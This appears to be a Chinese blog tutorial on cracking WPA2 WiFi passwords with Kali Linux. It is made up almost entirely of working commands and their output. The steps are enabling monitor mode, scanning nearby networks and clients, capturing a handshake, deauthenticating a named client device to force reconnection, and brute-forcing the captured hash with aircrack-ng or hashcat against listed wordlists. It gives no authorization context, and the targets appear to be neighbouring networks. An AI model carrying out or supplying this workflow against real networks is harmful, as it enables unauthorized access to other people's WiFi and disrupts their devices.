Kail技能点+1:WiFi密码破解
准备工具
USB无线网卡 airmon-ng软件
破解流程
查看网卡信息,找到无线网卡名字,我的是wlan0
ifconfig
用airmon-ng打开网卡监听
airmon-ng start wlan0
#关闭就 airmon-ng stop wlan0mon
查看监听后的网卡名,变成了wlan0mon
iwconfig #没输错,就是w
通过air命令扫描周边WIFI环境
airodump-ng wlan0mon
# 下面是精简的输出信息,bssid---路由器MAC,PWR---信号强度,带上-数符号,越大越好
# CH---信道,ESSID---路由器WIFI名字,STATION---连接设备的MAC
CH 7 ][ Elapsed: 0 s ][ 2023-10-31 04:02
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F4:2A:7D:D0:63:CC -83 2 0 0 7 130 WPA2 CCMP PSK ZHR
FE:6D:2F:F3:78:44 -73 3 0 0 6 360 WPA2 CCMP PSK <length: 0>
......
# 这下面是连接设备的信息
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) E0:B9:4D:DF:94:19 -85 0 - 1 0 2 24-4
F4:2A:7D:D0:63:CC BC:1C:81:87:15:53 -83 0 - 1 0 2
......
监听路由器与设备间的通信,抓包获取密码哈希值,还可以扫描到与该路由器通信的设备MAC
airodump-ng --bssid F4:2A:7D:D0:63:CC -c 7 -w ZHR wlan0mon
#airodump-ng --bssid 路由器MAC -c 信道 -w 抓包文件名 wlan0mon
# 抓到HASH后会显示 WPA handshake: 路由器MAC
3:36:56 Created capture file "Test0-01.cap".
CH 1 ][ Elapsed: 18 s ][ 2023-10-31 03:37 ][ WPA handshake: XXXXX
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
攻击设备,让设备重连(可选),第5步往往抓取不到HASH,或者要监听很久,就可以通过该步骤攻击一段时间后再用第五步的扫描监听
aireplay-ng -0 8 -a F4:2A:7D:D0:63:CC -c BC:1C:81:87:15:53 wlan0mon
# airodump-ng -0 攻击次数,这里是8次,0为无限次 -a 路由器MAC -c 与路由器连接设备的MAC wlan0mon
使用密码库撞库密码
aircrack-ng -w passwd.txt Test0-01.cap
# aircrack-ng -w 密码字典 抓到了HASH值的抓包文件
密码字典获取方式
网上的常用密码项目
[SecLists](https://github.com/danielmiessler/SecLists)
[Probable-Wordlists](https://github.com/berzerk0/Probable-Wordlists)
本地自带的密码字典
/usr/share/wordlists/rockyou.txt.gz
密码字典撞库性能提升
使用hashcat来代替aircrack-ng撞库
访问 https://hashcat.net/cap2hashcat/ 将cap文件转换为hashcat能处理的文件
不想网站转换的,可以考虑编译类型转换工具源码 https://github.com/ZerBea/hcxtools ,目前我还没有编译通过过
hashcat -m 22000 hashcat能处理的文件 密码字典
-m 22000 是指定了hashcat解密模式为WPA/WPA2
评论区